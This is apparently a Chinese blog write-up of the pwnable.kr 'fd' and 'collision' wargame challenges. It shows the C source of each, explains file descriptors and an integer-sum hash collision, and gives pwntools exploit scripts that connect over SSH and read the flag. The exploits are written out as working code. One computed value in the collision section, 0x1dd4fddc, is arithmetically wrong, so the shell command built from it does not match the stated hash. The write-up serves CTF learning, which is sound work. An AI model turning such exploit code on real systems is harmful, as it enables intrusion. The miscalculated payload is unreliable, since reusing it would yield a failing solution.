pwnable.kr(1-2)

fd

第一题ssh连接之后给出如下代码：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
//argc是命令行参数个数(必为int类型)，char*argv[]是指所有命令行参数，char *envp[]是环境变量
//argv参数是字符串指针数组，其各元素值为命令行中各字符串的首地址，指针数组的长度即为参数个数

    if(argc<2){
        printf("pass argv[1] a number\n");
        return 0;
    }
    int fd = atoi( argv[1] ) - 0x1234;
    //atoi函数将字符串转化成整形
    //fd文件描述符，只是一个整数
    int len = 0;
    len = read(fd, buf, 32);
    /*read()会把参数fd所指的文件传送count个字节到buf指针所指的内存中。若参数count为0，则read()不会有作用并返回0。
    返回值为实际读取到的字节数，如果返回0，表示已到达文件尾或是无可读取的数据，此外文件读写位置会随读取到的字节移动*/
    if(!strcmp("LETMEWIN\n", buf)){
        printf("good job :)\n");
        system("/bin/cat flag");
        exit(0);
    }
    printf("learn about Linux file IO\n");
    return 0;

}

这题的重点在题目中也提示了->fd
通过查阅资料了解到fd就是File descripter也就是文件描述符，维基上有如下解释：In Unix and related computer operating systems, a file descriptor (FD, less frequently fildes) is an abstract indicator (handle) used to access a file or other input/output resource, such as a pipe or network socket.
所以fd是在UNIX及其相关联系统上才有的，fd为一个非负整数，他的0，1，2代表了不同的含义

回到原题，关键要满足：buf=LETMEWIN，所以要输入LETMEWIN就要使int fd = atoi( argv[1] ) - 0x1234;中的fd为0，因为0x1234=4660(int)，因此在终端输入./fd 4660然后再写入LETMEWIN即可
再给出一个exp：

from pwn import *
pwn_ssh=ssh(host='pwnable.kr',user='fd',password='guest',port=2222)
print (pwn_ssh.connected())
sh=pwn_ssh.process(argv=['fd','4660'],executable='./fd')
sh.sendline("LETMEWIN")
print (sh.recvall())

collision

老规矩查看代码：

#include <stdio.h>
#include <string.h>
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){
    int* ip = (int*)p;
    int i;
    int res=0;
    for(i=0; i<5; i++){
        res += ip[i];
    }
    return res;
}

int main(int argc, char* argv[]){
/*前者可接受 命令行参数，argc表示参数个数， argv[]是参数数组,其中第0个参数是程序本身的名称（包含路径）。
argv[]是一个字符数组.
argv[0]:指向程序的全路径名
argv[1]:指向在DOS命令行中执行程序名后的第一个字符串。
argv[2]:指向第二个字符串。
*/

    if(argc<2){
        printf("usage : %s [passcode]\n", argv[0]);
        return 0;
    }
    if(strlen(argv[1]) != 20){
        printf("passcode length should be 20 bytes\n");
        return 0;
    }

//
//参数至少两个，hashcode=input
    if(hashcode == check_password( argv[1] )){
        system("/bin/cat flag");
        return 0;
    }
    else
        printf("wrong passcode.\n");
    return 0;
}

思路很明显：输入参数20个字节，最后res的值在5次循环相加之后要满足等于0x21DD09EC，还要说明的一点是int占4个字节，char占1个字节，因此int* ip = (int*)p;这里就将passcode分成了有5个参数的数组，所以随便输入一个hex(0x21DD09EC-0x01020304*4)得到0x1dd4fddc，于是在终端输入
./col $(python -c 'print "\xdc\xfd\xd4\x1d"+4*"\x04\x03\x02\x01"')
最终得到答案
有一点要说的是python -c，python给出的解释是：

-c cmd : program passed in as string (terminates option list)

给出exp：

from pwn import *
import os

pwn_ssh=ssh(host='pwnable.kr',user='col',password='guest',port=2222)
print (pwn_ssh.connected())

sh=pwn_ssh.process(argv=['collision','\xfc\x01\xf9\x39' * 5],executable='./col')
print (sh.recvall())